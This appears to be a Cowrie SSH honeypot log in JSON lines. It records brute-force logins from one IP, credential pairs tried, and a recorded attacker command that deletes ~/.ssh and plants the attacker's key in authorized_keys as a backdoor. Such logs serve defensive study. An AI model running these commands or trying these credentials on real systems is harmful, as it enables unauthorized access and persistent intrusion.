{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:34.415909Z","src_ip":"212.227.235.229","session":"b31c5bdd9385"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:35.541642Z","src_ip":"212.227.235.229","session":"79c4e6987f66"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:08:35.698230Z","src_ip":"212.227.235.229","session":"b31c5bdd9385"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:37.010473Z","src_ip":"212.227.235.229","session":"b31c5bdd9385"}
{"eventid":"cowrie.session.closed","duration":12.675994157791138,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:41.754278Z","src_ip":"212.227.235.229","session":"d7c7ad050957"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55132,"dst_ip":"1.2.3.4","dst_port":22,"session":"9905bf877f2e","protocol":"ssh","message":"New connection: 212.227.235.229:55132 (1.2.3.4:22) [session: 9905bf877f2e]","sensor":"my-vps","timestamp":"2025-09-08T23:09:09.912115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:09.913487Z","src_ip":"212.227.235.229","session":"9905bf877f2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:10.044929Z","src_ip":"212.227.235.229","session":"9905bf877f2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51782,"dst_ip":"1.2.3.4","dst_port":22,"session":"193272d9bdd6","protocol":"ssh","message":"New connection: 212.227.235.229:51782 (1.2.3.4:22) [session: 193272d9bdd6]","sensor":"my-vps","timestamp":"2025-09-08T23:09:10.447214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:10.448117Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"password123","message":"login attempt [nvidia/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:10.617475Z","src_ip":"212.227.235.229","session":"9905bf877f2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:10.756033Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:11.751195Z","src_ip":"212.227.235.229","session":"9905bf877f2e"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssword01","message":"login attempt [root/P@Ssword01] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:12.035046Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:12.786303Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:12.787161Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:12.788467Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:13.097924Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:13.810629Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:09:13.811329Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:09:14.121367Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:14.122285Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51786,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa78aecc8140","protocol":"ssh","message":"New connection: 212.227.235.229:51786 (1.2.3.4:22) [session: fa78aecc8140]","sensor":"my-vps","timestamp":"2025-09-08T23:09:14.433557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:14.434448Z","src_ip":"212.227.235.229","session":"fa78aecc8140"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:14.747869Z","src_ip":"212.227.235.229","session":"fa78aecc8140"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:16.089180Z","src_ip":"212.227.235.229","session":"fa78aecc8140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac18ece0af03","protocol":"ssh","message":"New connection: 212.227.235.229:49890 (1.2.3.4:22) [session: ac18ece0af03]","sensor":"my-vps","timestamp":"2025-09-08T23:09:16.103622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:16.104350Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:16.337821Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.login.success","username":"root","password":"root@2024","message":"login attempt [root/root@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.313488Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.507572Z","src_ip":"212.227.235.229","session":"fa78aecc8140"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:17.835953Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.836625Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.837753Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45280,"dst_ip":"1.2.3.4","dst_port":22,"session":"06c27d3d17cf","protocol":"ssh","message":"New connection: 212.227.235.229:45280 (1.2.3.4:22) [session: 06c27d3d17cf]","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.839489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:17.840491Z","src_ip":"212.227.235.229","session":"06c27d3d17cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:18.073003Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:18.148728Z","src_ip":"212.227.235.229","session":"06c27d3d17cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:18.557881Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:09:18.558584Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:09:18.794980Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:18.795848Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49282,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b4d36cc15d1","protocol":"ssh","message":"New connection: 212.227.235.229:49282 (1.2.3.4:22) [session: 2b4d36cc15d1]","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.027925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.029053Z","src_ip":"212.227.235.229","session":"2b4d36cc15d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.263374Z","src_ip":"212.227.235.229","session":"2b4d36cc15d1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.644206Z","src_ip":"212.227.235.229","session":"06c27d3d17cf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.955020Z","src_ip":"212.227.235.229","session":"06c27d3d17cf"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:19.962759Z","src_ip":"212.227.235.229","session":"193272d9bdd6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:20.243546Z","src_ip":"212.227.235.229","session":"2b4d36cc15d1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:21.480915Z","src_ip":"212.227.235.229","session":"2b4d36cc15d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49290,"dst_ip":"1.2.3.4","dst_port":22,"session":"968d16f20c4d","protocol":"ssh","message":"New connection: 212.227.235.229:49290 (1.2.3.4:22) [session: 968d16f20c4d]","sensor":"my-vps","timestamp":"2025-09-08T23:09:21.716799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:21.717728Z","src_ip":"212.227.235.229","session":"968d16f20c4d"}
